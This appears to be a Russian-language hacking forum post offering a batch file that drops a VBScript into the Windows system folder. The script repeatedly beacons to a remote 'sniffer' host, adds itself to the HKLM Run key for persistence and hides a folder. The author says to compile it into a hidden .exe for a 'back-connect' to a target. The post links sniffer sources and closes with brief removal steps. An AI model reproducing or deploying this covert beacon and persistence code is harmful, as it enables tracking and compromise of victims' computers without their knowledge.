Изящное решение для такого посыла на сниффер делаем такой батник:
Код:
MD %SystemRoot%\123123
echo >%SystemRoot%\123123\123.vbs
echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
echo sSource = "http://host.com/public/s.gif" >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo While 1 >>%SystemRoot%\123123\123.vbs
echo WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
echo If (Timer - iTimer) * 3 Then >>%SystemRoot%\123123\123.vbs
echo oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
echo on error resume next >>%SystemRoot%\123123\123.vbs
echo oHTTP.send >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo End If >>%SystemRoot%\123123\123.vbs
echo WEnd >>%SystemRoot%\123123\123.vbs
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" %SystemRoot%\123123\123.vbs
attrib /d %systemdrive%\Docume~1\123 +h +s
Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер.
Учтите что лог сниффера будет постоянно засран.
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.
Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar
Лечится так:
1. Пуск>выполнить>msconfig>автоза рузка>убрать галку с 123
2. Удалить фаил С:/windows/123123/123.vbs
3. Убить процесс wscript.exe
Радуемся и пляшем.
